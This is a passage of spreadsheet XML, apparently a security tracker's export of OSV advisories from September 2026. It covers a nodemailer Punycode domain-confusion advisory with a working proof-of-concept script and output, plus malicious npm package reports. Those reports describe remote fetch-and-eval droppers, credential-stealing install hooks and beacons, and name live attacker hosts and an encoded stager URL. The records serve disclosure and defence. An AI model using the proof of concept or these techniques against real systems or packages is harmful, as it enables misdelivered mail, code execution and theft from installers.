t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1669" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1669" s="5" t="inlineStr"><is><t>GHSA-v3f6-m9j2-437p</t></is></c><c r="D1669" s="5" t="inlineStr" /><c r="E1669" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1669" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1669" s="5" t="inlineStr" /><c r="H1669" s="5" t="inlineStr" /><c r="I1669" s="5" t="inlineStr" /><c r="J1669" s="5" t="inlineStr" /><c r="K1669" s="5" t="inlineStr" /><c r="L1669" s="5" t="inlineStr"><is><t>NuGet:Microsoft.AspNetCore.Server.IISIntegration</t></is></c><c r="M1669" s="5" t="inlineStr"><is><t>10.0.12, 11.0.0-rc.1, 8.0.31, 9.0.20</t></is></c><c r="N1669" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1669" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1669" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1669" s="5" t="inlineStr" /><c r="R1669" s="5" t="inlineStr" /><c r="S1669" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-8cp2-47hg-mfgh. This link is maintained to preserve external references.

### Original Description
Improper handling of highly compressed data (data amplification) in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1669" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-v3f6-m9j2-437p</t></is></c></row><row r="1670"><c r="A1670" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1670" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1670" s="5" t="inlineStr"><is><t>GHSA-wmmp-3585-3rmp</t></is></c><c r="D1670" s="5" t="inlineStr" /><c r="E1670" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1670" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1670" s="5" t="inlineStr" /><c r="H1670" s="5" t="inlineStr" /><c r="I1670" s="5" t="inlineStr" /><c r="J1670" s="5" t="inlineStr" /><c r="K1670" s="5" t="inlineStr" /><c r="L1670" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1670" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N1670" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1670" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1670" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1670" s="5" t="inlineStr" /><c r="R1670" s="5" t="inlineStr" /><c r="S1670" s="5" t="inlineStr"><is><t>### Summary

Nodemailer resolves an international (IDN / non-ASCII) recipient **domain** to a different Punycode `xn--` label than every UTS‑46‑conformant parser (web browsers, the WHATWG URL Standard, Node's `url.domainToASCII`, Python's `idna`). Its address normalizer (`_normalizeAddress` in `lib/mime-node/index.js`) uses the bundled **raw RFC‑3492 Punycode codec with no UTS‑46 mapping/normalization**, so a domain that a standards‑compliant validator maps to a trusted domain is delivered by Nodemailer to a **different, attacker‑registrable domain**.

An application that applies a domain allow‑list / same‑domain check to a recipient using a normal IDN‑aware parser (or that shows the normalized recipient to a user for confirmation) and then relies on Nodemailer to deliver to that domain can be induced to send email to an **unintended external domain**. This is the same weakness class as CVE‑2025‑13033 (Interpretation Conflict, CWE‑436) but reached through IDN/Punycode rather than quoted local‑parts, and it is not addressed by the 7.0.7 fix.

Because the mismatch can be triggered with an **invisible** character (U+00AD SOFT HYPHEN) that UTS‑46 folds away to the *exact* trusted domain string, no visible look‑alike/homograph is required.

### Details

`lib/mime-node/index.js` → `_normalizeAddress(address)` (around lines 1307–1346) splits the address at the last `@` and normalizes the domain like this:

```js
// lib/mime-node/index.js
try {
    if (/[\x80-￿]/.test(user)) {
        encodedDomain = punycode.toUnicode(domain.toLowerCase());   // line ~1338
    } else {
        encodedDomain = punycode.toASCII(domain.toLowerCase());     // line ~1340
    }
} catch (_err) {
    // keep domain as supplied
}
return `${this._normalizeLocalPart(user)}@${encodedDomain}`;         // line ~1346
```

`punycode` here is the project’s bundled codec (`lib/punycode/`), which is a **pure RFC 3492 (Punycode) implementation**. The only normalization applied to the domain is `.toLowerCase()`. It performs **none of the UTS‑46 “IDNA2008 + compatibility processing” steps** that browsers and DNS‑facing resolvers apply before Punycode encoding, specifically:

* removing **Ignored** code points such as `U+00AD` SOFT HYPHEN,
* **Mapping** full‑width / compatibility characters to their canonical ASCII forms,
* Unicode **NFC** normalization,
* validity checks.

As a result, for any domain containing a UTS‑46‑mapped or ‑ignored character, Nodemailer’s `punycode.toASCII(...)` produces a **different A‑label** than `url.domainToASCII(...)` (Node ≥ 7 / WHATWG), `new URL('http://'+domain)`, browsers, and Python’s `idna` (`uts46=True`). Nodemailer then uses its A‑label as:

* the SMTP envelope recipient written to the wire as `RCPT TO:&lt;local@xn--…&gt;` (`getEnvelope()` → `lib/smtp-connection/index.js` `_setEnvelope`), **and**
* the address emitted in the `To:` / `From:` headers (`_convertAddresses`).

So the domain a standards‑compliant validator computes and the domain Nodemailer actually delivers to **disagree**, on a syntactically valid, validator‑accepted address. Concrete divergences (verified on 9.0.6):

| recipient (raw) | UTS‑46 parser (`url.domainToASCII`) | Nodemailer delivers to |
|---|---|---|
| `victim@compa{U+00AD}ny.com` (invisible soft hyphen) | `company.com` | `xn--company-pka.com` |
| `victim@ｃｏｍｐａｎｙ.com` (full‑width) | `company.com` | `xn--mi7cd4afch9d.com` |
| `user@exámple.com` (NFD `a`+U+0301) | `xn--exmple-qta.com` | `xn--example-vge.com` |

This is the “Punycode / IDN parser discrepancy” technique documented in PortSwigger’s *Splitting the email atom* research (which produced e.g. Joomla CVE‑2024‑21725 and fixes in the PHP `idna_convert` library). The fix for CVE‑2025‑13033 (nodemailer 7.0.7) hardened the *quoted‑local‑part* path only; this IDN path is independent and still present in **9.0.6 (latest)** and, given the long‑standing use of the bundled RFC‑3492 codec, earlier releases.

**Suggested remediation:** perform UTS‑46 processing before/at domain encoding so Nodemailer’s resolution matches browsers, validators, and DNS — e.g. use the runtime’s `url.domainToASCII()` (available since Node 7) instead of the raw `punycode.toASCII`, and decode with the matching UTS‑46 `domainToUnicode`. At minimum, reject a domain whose value changes under UTS‑46 mapping (i.e. `punycode.toASCII(d)` ≠ `url.domainToASCII(d)`).

### PoC

Environment: Node.js ≥ 18, the published `nodemailer@9.0.6`. No special configuration; the discrepancy is in domain normalization itself.

`poc-idn.js`:

```js
'use strict';
const net = require('net');
const url = require('url');
const nodemailer = require('nodemailer'); // 9.0.6

const TRUSTED   = 'company.com';                        // the only domain the app will mail
const RECIPIENT = 'victim@compa\u00ADny.com';           // attacker input: invisible U+00AD inside "company"

// The app's domain allow-list check, done the standard (UTS-46 / browser / WHATWG) way:
const seen = url.domainToASCII(RECIPIENT.split('@').pop());
console.log('validator (url.domainToASCII) sees:', JSON.stringify(seen),
            seen === TRUSTED ? '=&gt; ALLOWED (equals trusted domain)' : '');

// A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'app@company.com', to: RECIPIENT, subject: 'reset your password', text: 'secret link' });
  t.close(); server.close();
});
```

Run:

```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-idn.js
```

Actual output (Nodemailer 9.0.6):

```
validator (url.domainToASCII) sees: "company.com" =&gt; ALLOWED (equals trusted domain)
nodemailer transmits             : RCPT TO:&lt;victim@xn--company-pka.com&gt;
```

The application’s domain check approves `company.com`, but the message is sent to `xn--company-pka.com` — a **different domain an attacker can register** — carrying the `To:` header `&lt;victim@xn--company-pka.com&gt;` as well.

A containerized version that proves the same result against a **real RFC 5321 SMTP server** (`aiosmtpd`) is included alongside this report (`docker compose up --build`, cases `R6`/IDN); the receiving server accepts `RCPT TO:&lt;victim@xn--company-pka.com&gt;` and reports the recipient domain as `xn--company-pka.com`.

### Impact

Any application that uses Nodemailer to send mail to a recipient whose domain is subjected to a security or trust decision made with a *different* (UTS‑46‑conformant) parser, and then trusts Nodemailer to deliver to that domain. This includes:
  * recipient **allow‑list / block‑list / “same corporate domain” checks** implemented with `new URL()`, `url.domainToASCII`, a browser‑side check, or an IDN library;
  * flows that **display or log the normalized recipient domain** for human confirmation (the shown `company.com` differs from the delivered `xn--company-pka.com`);
  * any domain‑gated feature (employee‑only registration, “send only to our tenant”, notification routing).

## Patched in 9.1.0

Domain encoding now applies UTS-46 ([259c32d](https://github.com/nodemailer/nodemailer/commit/259c32d)), so `victim@compa­ny.com` resolves to `company.com`, matching `url.domainToASCII` and browsers.

One caveat on the suggested remediation, hardened in [b212ac4](https://github.com/nodemailer/nodemailer/commit/b212ac4): `url.domainToASCII` is a WHATWG **host parser**, not a pure UTS-46 mapper. It terminates the host at `/`, `\\`, `?` and `#` and percent-decodes. Used unguarded it introduces a worse version of the same weakness, since `user@attacker.example/mail.corp.example` encodes to the deliverable `user@attacker.example` where the bundled Punycode codec left it intact and unroutable. Those characters are now kept away from the mapper.

On severity, "attacker-registrable" is doing significant work in the report: `xn--company-pka.com` decodes to a label containing U+00AD and `xn--mi7cd4afch9d.com` to full-width Latin, neither of which Verisign's IDN tables permit for a .com registration. The misdelivery and the confirmation-UI mismatch stand regardless, which is why this is rated level with the comment issue rather than above it.</t></is></c><c r="T1670" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-wmmp-3585-3rmp</t></is></c></row><row r="1671"><c r="A1671" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1671" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1671" s="5" t="inlineStr"><is><t>MAL-2026-16048</t></is></c><c r="D1671" s="5" t="inlineStr" /><c r="E1671" s="5" t="inlineStr" /><c r="F1671" s="5" t="inlineStr" /><c r="G1671" s="5" t="inlineStr" /><c r="H1671" s="5" t="inlineStr" /><c r="I1671" s="5" t="inlineStr" /><c r="J1671" s="5" t="inlineStr" /><c r="K1671" s="5" t="inlineStr" /><c r="L1671" s="5" t="inlineStr"><is><t>npm:punypump</t></is></c><c r="M1671" s="5" t="inlineStr" /><c r="N1671" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1671" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1671" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1671" s="5" t="inlineStr" /><c r="R1671" s="5" t="inlineStr" /><c r="S1671" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6e56cc14096d20f679823bf15af9f44dff039e01f23d2082eba8020200d04a7f)
The package presents itself as a console shim (index.js is a verbatim copy of console-browserify with description 'Emulate console for all the browsers'), but also ships library.js and test/sessionCtrl.js which auto-execute a stager on module load via initializeService().catch(...). The stager fetches an opaque blob from a base64-hidden URL (config.API_GATEWAY = 'aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9WNk5CWA==' decoding to https://www.jsonkeeper.com/b/V6NBX), AES-256-CBC decrypts it with a hardcoded key, and passes the plaintext to eval(). The endpoint URL, HTTP header name, and header value are all base64-encoded in config.js. Content served from the jsonkeeper.com paste is mutable and attacker-controlled, so require('punypump/library') runs arbitrary attacker code on the installer's machine.
</t></is></c><c r="T1671" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16048</t></is></c></row><row r="1672"><c r="A1672" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1672" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1672" s="5" t="inlineStr"><is><t>MAL-2026-16049</t></is></c><c r="D1672" s="5" t="inlineStr" /><c r="E1672" s="5" t="inlineStr" /><c r="F1672" s="5" t="inlineStr" /><c r="G1672" s="5" t="inlineStr" /><c r="H1672" s="5" t="inlineStr" /><c r="I1672" s="5" t="inlineStr" /><c r="J1672" s="5" t="inlineStr" /><c r="K1672" s="5" t="inlineStr" /><c r="L1672" s="5" t="inlineStr"><is><t>npm:tailwindcss-aspectratio-styles</t></is></c><c r="M1672" s="5" t="inlineStr" /><c r="N1672" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1672" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1672" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1672" s="5" t="inlineStr" /><c r="R1672" s="5" t="inlineStr" /><c r="S1672" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9b995eb02f80f9037beda9f8a864f55109e054925175289df0c1b29ed8011bc3)
src/index.js, referenced by the package main and executed on require(), performs an HTTP GET to http://tailwindlan.online, writes the response body to a sibling file, and immediately require()s that file, giving the operator of tailwindlan.online arbitrary code execution in the installer's Node.js process at import time. The fetch uses plain HTTP with no integrity or signature check, and the domain is unrelated to the tailwindlabs project. The package name resembles the official @tailwindcss/aspect-ratio plugin, and package.json's repository field points at tailwindlabs/tailwindcss-aspect-ratio to mimic the upstream; the legitimate plugin code is preserved verbatim with the remote-fetch-and-execute block appended to the end of the single minified line.
</t></is></c><c r="T1672" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16049</t></is></c></row><row r="1673"><c r="A1673" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1673" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1673" s="5" t="inlineStr"><is><t>MAL-2026-16050</t></is></c><c r="D1673" s="5" t="inlineStr" /><c r="E1673" s="5" t="inlineStr" /><c r="F1673" s="5" t="inlineStr" /><c r="G1673" s="5" t="inlineStr" /><c r="H1673" s="5" t="inlineStr" /><c r="I1673" s="5" t="inlineStr" /><c r="J1673" s="5" t="inlineStr" /><c r="K1673" s="5" t="inlineStr" /><c r="L1673" s="5" t="inlineStr"><is><t>npm:@aspect-adv-ui/consent-manager</t></is></c><c r="M1673" s="5" t="inlineStr" /><c r="N1673" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1673" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1673" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1673" s="5" t="inlineStr" /><c r="R1673" s="5" t="inlineStr" /><c r="S1673" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b30b507d6c71f746b0af2d19cbbb85357f15189e7e93118c75b4cb215adc0ece)
@aspect-adv-ui/consent-manager 2.4.1 declares a postinstall hook (`node setup.js`) that fires automatically on every `npm install`. setup.js issues an HTTPS GET to a hardcoded webhook.site inspection endpoint (https://webhook.site/kapper), sending install-event metadata (source IP, TLS/user-agent fingerprint) to an author-controlled third-party collector. The package is advertised as a small GDPR/CCPA consent-bar React component with no native build, no binary, and no legitimate install-time work; the postinstall exists solely to run this beacon. webhook.site is a public request-inspection service commonly used as an anonymous exfiltration/beacon endpoint, and the beacon is not disclosed or opt-in.
</t></is></c><c r="T1673" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16050</t></is></c></row><row r="1674"><c r="A1674" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1674" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1674" s="5" t="inlineStr"><is><t>MAL-2026-16051</t></is></c><c r="D1674" s="5" t="inlineStr" /><c r="E1674" s="5" t="inlineStr" /><c r="F1674" s="5" t="inlineStr" /><c r="G1674" s="5" t="inlineStr" /><c r="H1674" s="5" t="inlineStr" /><c r="I1674" s="5" t="inlineStr" /><c r="J1674" s="5" t="inlineStr" /><c r="K1674" s="5" t="inlineStr" /><c r="L1674" s="5" t="inlineStr"><is><t>npm:@umschool/analytics</t></is></c><c r="M1674" s="5" t="inlineStr" /><c r="N1674" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1674" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1674" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1674" s="5" t="inlineStr" /><c r="R1674" s="5" t="inlineStr" /><c r="S1674" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (da14c2843514d3c9103335648bc81a8bce18fc173b27c2ab39ebe2c6c0abe028)
@umschool/analytics@999.0.4 targets the internal @umschool npm scope with an implausibly high version number to force resolution over any private package of the same name. Its postinstall.js runs on npm install and collects host identity (os.hostname, os.userInfo, process.cwd), reads /etc/hostname, /etc/hosts, /etc/resolv.conf, and /proc/version, filters process.env for credential-shaped keys matching a broad regex (token/secret/key/pass/aws/db/jwt/auth/etc.), and walks parent directories to read.env and config.* files. Each payload is base64-encoded and transmitted via three HTTPS GET beacons to akko.requestcatcher.com, with an additional hex-encoded DNS beacon of hostname+user to the same domain. A README/comment self-labeling the code as a 'HARMLESS PoC' does not change the observed behavior: credential-shaped environment variables, dotenv files, and internal network configuration leave the installer's build host to a third-party request-catcher.
</t></is></c><c r="T1674" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16051</t></is></c></row><row r="1675"><c r="A1675" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1675" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1675" s="5" t="inlineStr"><is><t>MAL-2026-16052</t></is></c><c r="D1675" s="5" t="inlineStr" /><c r="E1675" s="5" t="inlineStr" /><c r="F1675" s="5" t="inlineStr" /><c r="G1675" s="5" t="inlineStr" /><c r="H1675" s="5" t="inlineStr" /><c r="I1675" s="5" t="inlineStr" /><c r="J1675" s="5" t="inlineStr" /><c r="K1675" s="5" t="inlineStr" /><c r="L1675" s="5" t="inlineStr"><is><t>npm:open-item-validator</t></is></c><c r="M1675" s="5" t="inlineStr" /><c r="N1675" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1675" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1675" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1675" s="5" t="inlineStr" /><c r="R1675" s="5" t="inlineStr" /><c r="S1675" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7ba5b55d57f4938bf2494d369d14434bb80ba6f6c712c7f8d89ae773c27dc457)
On require(), index.js spawns a detached, unref'd background Node process (lib/check-items.js) that repeatedly HTTP-GETs a JSON payload from http://itemx.servegame.com:8888/api/x-realtime and executes the returned JavaScript via new Function('require','module', payload.code)(require, moduleObj). The daemon survives the parent process and re-polls the endpoint on a configured interval, so whoever controls that endpoint runs arbitrary Node code on the installer's host on library load and continuously thereafter. The fetch is over plain HTTP to a No-IP dynamic-DNS host (servegame.com) that does not match the publisher's declared homepage (game.spawnrealm.com); a bundled RSA signature check does not alter that the endpoint operator chooses what code runs. README framing as 'signed game code updates' is inconsistent with the shipped generic fetch-and-exec mechanism and the publisher/destination host mismatch.
</t></is></c><c r="T1675" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16052</t></is></c></row><row r="1676"><c r="A1676" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1676" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1676" s="5" t="inlineStr"><is><t>MAL-2026-16056</t></is></c><c r="D1676" s="5" t="inlineStr" /><c r="E1676" s="5" t="inlineStr" /><c r="F1676" s="5" t="inlineStr" /><c r="G1676" s="5" t="inlineStr" /><c r="H1676" s="5" t="inlineStr" /><c r="I1676" s="5" t="inlineStr" /><c r="J1676" s="5" t="inlineStr" /><c r="K1676" s="5" t="inlineStr" /><c r="L1676" s="5" t="inlineStr"><is><t>npm:tailwind-aspect-styles</t></is></c><c r="M1676" s="5" t="inlineStr" /><c r="N1676" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1676" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1676" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1676" s="5" t="inlineStr" /><c r="R1676" s="5" t="inlineStr" /><c r="S1676" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (4d63fe1e50dc7d704732a5e92e95f320fcc3fac45c5a0a223ed278f316c2bb14)
The package's main module (src/index.js) performs an https.get to http://23.27.245.100/index.js over plain HTTP, writes the response to./inout.js in the consumer's working directory, and immediately require()s the written file. The fetch is unpinned, unauthenticated, and served from a bare IP over cleartext, so the operator of that endpoint controls arbitrary JavaScript executed in the Node process that loads this package. The package presents itself as the Tailwind aspect-ratio plugin, with a package.json repository field pointing to tailwindlabs/tailwindcss-aspect-ratio, while the dropper is appended after the legitimate-looking plugin export.
</t></is></c><c r="T1676" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16056</t></is></c></row><row r="1677"><c r="A1677" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1677" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1677" s="5" t="inlineStr"><is><t>MAL-2026-16057</t></is></c><c r="D1677" s="5" t="inlineStr" /><c r="E1677" s="5" t="inlineStr" /><c r="F1677" s="5" t="inlineStr" /><c r="G1677" s="5" t="inlineStr" /><c r="H1677" s="5" t="inlineStr" /><c r="I1677" s="5" t="inlineStr" /><c r="J1677" s="5" t="inlineStr" /><c r="K1677" s="5" t="inlineStr" /><c r="L1677" s="5" t="inlineStr"><is><t>npm:toru-ultimate</t></is></c><c r="M1677" s="5" t="inlineStr" /><c r="N1677" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1677" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1677" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1677" s="5" t="inlineStr" /><c r="R1677" s="5" t="inlineStr" /><c r="S1677" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e6ef8cb6f3ca866b67fa91f2e770c674ddb7d6b110fd671ba98669dc1220510f)
The package's loginViaAPI() function POSTs caller-supplied Facebook email, password, and 2FA Base32 secret to https://minhdong.site/api/v1/facebook/login_ios (a domain unrelated to Facebook, tied to the package's contributor). The response returns Facebook cookies/access_token which are then installed into the caller's session. The README documents login via appState cookies and does not disclose that email/password logins are proxied through minhdong.site. Additionally, package.json declares 'fca-unofficial' as 'github:VangBanLaNhat/fca-unofficial' — an unpinned mutable GitHub reference with no commit SHA. npm install fetches whatever bytes the branch HEAD returns, with no integrity check, and this module is require'd by the bundled E2EE client, so its code runs at import. Whoever controls that GitHub branch controls code delivered to every installer.
</t></is></c><c r="T1677" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16057</t></is></c></row><row r="1678"><c r="A1678" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1678" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1678" s="5" t="inlineStr"><is><t>MAL-2026-16058</t></is></c><c r="D1678" s="5" t="inlineStr" /><c r="E1678" s="5" t="inlineStr" /><c r="F1678" s="5" t="inlineStr" /><c r="G1678" s="5" t="inlineStr" /><c r="H1678" s="5" t="inlineStr" /><c r="I1678" s="5" t="inlineStr" /><c r="J1678" s="5" t="inlineStr" /><c r="K1678" s="5" t="inlineStr" /><c r="L1678" s="5" t="inlineStr"><is><t>npm:vinzz-wcli</t></is></c><c r="M1678" s="5" t="inlineStr" /><c r="N1678" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1678" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1678" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1678" s="5" t="inlineStr" /><c r="R1678" s="5" t="inlineStr" /><c r="S1678" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8dec0212466f7170f1e00ecbfe3f846cbf5d211917c3831a6ee162ca6d44ec10)
vinzz-wcli is a WhatsApp CLI whose main entry (index.js) sets `global.ownerr = "6285185667890@s.whatsapp.net"` and treats any incoming WhatsApp message from that JID as coming from an authorized owner. The `messages.upsert` handler routes messages from owners into `handleCommand`, which dispatches to plugins including `cmd` (which calls `child_process.exec` on the message text) and `eval` (which builds and runs an `AsyncFunction` from the message text). When an installer runs the CLI and pairs their own WhatsApp account, the hardcoded third-party number is silently added as an owner and can send arbitrary shell commands and JavaScript to be executed on the installer's host with the installer's privileges. The tarball also ships a second file, index2.js, which is not the declared main but contains the same hardcoded owner JID and the same messages.upsert -&gt; handleCommand dispatch, providing an equivalent execution path if that file is invoked directly.
</t></is></c><c r="T1678" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16058</t></is></c></row><row r="1679"><c r="A1679" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1679" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1679" s="5" t="inlineStr"><is><t>MAL-2026-16199</t></is></c><c r="D1679" s="5" t="inlineStr" /><c r="E1679" s="5" t="inlineStr" /><c r="F1679" s="5" t="inlineStr" /><c r="G1679" s="5" t="inlineStr" /><c r="H1679" s="5" t="inlineStr" /><c r="I1679" s="5" t="inlineStr" /><c r="J1679" s="5" t="inlineStr" /><c r="K1679" s="5" t="inlineStr" /><c r="L1679" s="5" t="inlineStr"><is><t>npm:plogme</t></is></c><c r="M1679" s="5" t="inlineStr" /><c r="N1679" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1679" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1679" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1679" s="5" t="inlineStr" /><c r="R1679" s="5" t="inlineStr" /><c r="S1679" s="5" t="inlineStr"><is><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is></c><c r="T1679" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16199</t></is></c></row></sheetData><autoFilter ref="A1:T1679" /><conditionalFormatting sqref="E2:E1679"><cfRule type="cellIs" priority="1" operator="equal" dxfId="0"><formula>"CRITICAL"</formula></cfRule><cfRule type="cellIs" priority="2" operator="equal" dxfId="1"><formula>"HIGH"</formula></cfRule><cfRule type="cellIs" priority="3" operator="equal" dxfId="2"><formula>"MEDIUM"</formula></cfRule><cfRule type="cellIs" priority="4" operator="equal" dxfId="3"><formula>"LOW"</formula></cfRule></conditionalFormatting><conditionalFormatting sqref="G2:G1679"><cfRule type="cellIs" priority="5" operator="equal" dxfId="4"><formula>"Yes"</formula></cfRule></conditionalFormatting><hyperlinks><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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1465" r:id="rId1464" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1466" r:id="rId1465" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1467" r:id="rId1466" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1468" r:id="rId1467" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1469" r:id="rId1468" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1470" r:id="rId1469" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1471" r:id="rId1470" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1472" r:id="rId1471" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1473" r:id="rId1472" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1474" r:id="rId1473" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1475" r:id="rId1474" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1476" r:id="rId1475" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1477" r:id="rId1476" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1478" r:id="rId1477" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1479" r:id="rId1478" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1480" r:id="rId1479" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1481" r:id="rId1480" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1482" r:id="rId1481" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1483" r:id="rId1482" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1484" r:id="rId1483" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1485" r:id="rId1484" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1486" r:id="rId1485" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1487" r:id="rId1486" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1488" r:id="rId1487" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1489" r:id="rId1488" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1490" r:id="rId1489" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1491" r:id="rId1490" 